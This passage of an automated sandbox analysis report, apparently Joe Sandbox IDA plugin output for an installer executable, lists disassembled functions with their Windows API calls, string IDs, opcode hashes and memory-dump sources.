                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                              • String ID: << Advanced Installer (x86) Log >>$Ls
                                                                                                                                                                              • API String ID: 3699736680-2779674016
                                                                                                                                                                              • Opcode ID: 53e209f69c6bb3e8a9ad2073df762772b7ac891fd3141fd92769f17eb2d06395
                                                                                                                                                                              • Instruction ID: b9117a990c5176b64992560f41a487dd0f47bd634e48dcdbdbe03240e5de4363
                                                                                                                                                                              • Opcode Fuzzy Hash: 53e209f69c6bb3e8a9ad2073df762772b7ac891fd3141fd92769f17eb2d06395
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B61D070905645DFD700CF69C94879ABBF4FF8A314F1882ADD510EB791DB74AA08CB91
                                                                                                                                                                              Function 00D1F650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,E5106CA8,?,6CCF37E0,?), ref: 00D1F6B2
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,?,0000C800), ref: 00D1F748
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,0000C800), ref: 00D1F7BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1065093856-1452845052
                                                                                                                                                                              • Opcode ID: f7465765554db767f5dfbc8682f25896b4170d3fdcae041e5ceaa1574882b159
                                                                                                                                                                              • Instruction ID: 9c4792000a36b0af38d052b6e8c4e78be67595000418ef1a9aa8a2acca48892c
                                                                                                                                                                              • Opcode Fuzzy Hash: f7465765554db767f5dfbc8682f25896b4170d3fdcae041e5ceaa1574882b159
                                                                                                                                                                              • Instruction Fuzzy Hash: D0515A71900208AFDF14DFA5DD45BEEBBB9FF48314F24826AE400B7290DB755A44CB64
                                                                                                                                                                              Function 00BD50A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000020), ref: 00BD518B
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00BD51C8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpyn
                                                                                                                                                                              • String ID: ?$t
                                                                                                                                                                              • API String ID: 97706510-1995845436
                                                                                                                                                                              • Opcode ID: 7e52e2ac57f4017331c4730188245344d3b75ba02a84055ca25d85991dcbf538
                                                                                                                                                                              • Instruction ID: a210eb1e1684683b4dc2c1b2700301ff3bd663ae7a086e502c4cfd5246f2fe56
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e52e2ac57f4017331c4730188245344d3b75ba02a84055ca25d85991dcbf538
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F514C71508740AFE721DF61DC49B9BBBE8EB48701F00492EF699E6291E774A508CB62
                                                                                                                                                                              Function 00BB0EF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException,?,?,?,?,00DA9680,000000FF), ref: 00BB0F32
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BB0F38
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-3996158991
                                                                                                                                                                              • Opcode ID: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction ID: 4e8fd1e35b9bd316a1986826290dd36403ea9051864cc1cb0d95b6b3b8491259
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B315071914209DFDB20EFA8C855BFEB7F4EB15310F104A69E825B32D1DBB49A44CBA1
                                                                                                                                                                              Function 00BB9DD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BB9E0C
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB9E20
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9E5F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 2351996187-3261393531
                                                                                                                                                                              • Opcode ID: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction ID: 8f1636963db1126f160c2bd3395035903c06df1da83634ede9dec6e5dda58cfd
                                                                                                                                                                              • Opcode Fuzzy Hash: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction Fuzzy Hash: CE11B231A05244DFCB20CF69D80476ABBE4EB9AB20F14879ED915A7390D7B1A808C790
                                                                                                                                                                              Function 00D84AFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue), ref: 00D84B09
                                                                                                                                                                              • GetLastError.KERNEL32(?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue,?,?,00D819F4), ref: 00D84B13
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84B3B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              • Opcode ID: 31d4a1a447a0f10d97898fcc5f33853666b8b138a9eef30f5074d1fabacbef1f
                                                                                                                                                                              • Instruction ID: 2eaf912b7e141d752f3456687ab34b623920b34985013011a8648164ec5a6f82
                                                                                                                                                                              • Opcode Fuzzy Hash: 31d4a1a447a0f10d97898fcc5f33853666b8b138a9eef30f5074d1fabacbef1f
                                                                                                                                                                              • Instruction Fuzzy Hash: C4E04831740205FBEB103B91EC06F297B58AB00B50F244021FA0CF90E0E772E995C794
                                                                                                                                                                              Function 00BB6480 Relevance: 6.3, APIs: 4, Instructions: 269memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BB654A
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6596
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB65B8
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                                                              • Opcode ID: 5e44871ecf4715c42af7f4789838c4d4a0b698b30fbece97b3a9ff7bac3675b0
                                                                                                                                                                              • Instruction ID: efd5f52a09ad7c071714711a8a15b7130d5171571d131b65306e507d973cfd79
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e44871ecf4715c42af7f4789838c4d4a0b698b30fbece97b3a9ff7bac3675b0
                                                                                                                                                                              • Instruction Fuzzy Hash: D9A14F71A002099FDB25DFA9C944BFEB7F8EF44714F108159E915E7280EBB8AE05CB61
                                                                                                                                                                              Function 00BC4650 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(E5106CA8,E5106CA8,?), ref: 00BC468F
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC469C
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00BC4773
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction ID: 7cb78d617386937db14018eedaca8f0dc8b94d6c4a17145f4cb027056ad463b6
                                                                                                                                                                              • Opcode Fuzzy Hash: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction Fuzzy Hash: DC41C2342007418FDB11DF28D954BAABBF5EF56310F2046AEE596E7391CB31AE15CB90
                                                                                                                                                                              Function 00BC4480 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC44EA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC44F7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4548
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: ce9ff3c58b8744f9667e351b26f58bfbc7ceedc57e4bbbe5da93ec77dea5f1b3
                                                                                                                                                                              • Instruction ID: 2cc2cbfa325923c03c328966e7cb6eec0cc891e3e6c8b5ba03663d615326cddf
                                                                                                                                                                              • Opcode Fuzzy Hash: ce9ff3c58b8744f9667e351b26f58bfbc7ceedc57e4bbbe5da93ec77dea5f1b3
                                                                                                                                                                              • Instruction Fuzzy Hash: 9021A636900244DFDF11CF64D844BA97BB4FB16324F2402AAE859AB396D7325A49CB60
                                                                                                                                                                              Function 00BC4570 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC45DA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC45E7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC462E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: 13a0b7b33198783eb4b40f480e42cbd2b85f5a075bcbbd214a3dc7f233e79d70
                                                                                                                                                                              • Instruction ID: c14cb5f8b105733ef2822bae78fbc66579d35e0b4ae0b01e617b4f3ee149995f
                                                                                                                                                                              • Opcode Fuzzy Hash: 13a0b7b33198783eb4b40f480e42cbd2b85f5a075bcbbd214a3dc7f233e79d70
                                                                                                                                                                              • Instruction Fuzzy Hash: 1821C435900244DFDF11CF64DC44B99BBB4FF16724F2006AAEC55AB292D7329A49CBA0
                                                                                                                                                                              Function 00BC43C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC441D
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC442A
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4452
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: 3424bd533d3463be52578b278525226032f229a05ec8deadcfe3423a4ecede42
                                                                                                                                                                              • Instruction ID: e77f731a81b8e9ff744d0097b26d0f3713bc021d429e776a752dcd7535be93fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 3424bd533d3463be52578b278525226032f229a05ec8deadcfe3423a4ecede42
                                                                                                                                                                              • Instruction Fuzzy Hash: 6921E936D04244DFDF05CF64D850BE9BBB4EB56324F2043ADD855A7392C7325A49CBA0
                                                                                                                                                                              Function 00D7DB49 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00D7DB50
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00D7DB5B
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7DBC9
                                                                                                                                                                                • Part of subcall function 00D7DCAB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D7DCC3
                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00D7DB76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                                                              • Opcode ID: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction ID: 5bd197c05396813ac1fd7007559bac95732d8962b36610ea17c3fa0a46ab5d6e
                                                                                                                                                                              • Opcode Fuzzy Hash: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction Fuzzy Hash: 71019A366002249FC706FB60D88597CBB72EF84340B28801AE805B7391DF746E86CBE5
                                                                                                                                                                              Function 00CC6150 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00CC6381
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                              • String ID: ios_base::failbit set$iostream
                                                                                                                                                                              • API String ID: 2659868963-302468714
                                                                                                                                                                              • Opcode ID: c25f8b66e61d4c63b0c41c0a7f561b18bec19793a320644ae19bcb886ed1c0f1
                                                                                                                                                                              • Instruction ID: e19ca70326a89a44f19dfae27207eaec9d8bc001f176ee1ff27757c04c7013fb
                                                                                                                                                                              • Opcode Fuzzy Hash: c25f8b66e61d4c63b0c41c0a7f561b18bec19793a320644ae19bcb886ed1c0f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 35D1CE71D00248DFDB14DFA8C985BAEFBB5EF49310F24826DE815AB381E7745A44CBA1
                                                                                                                                                                              Function 00BB8400 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
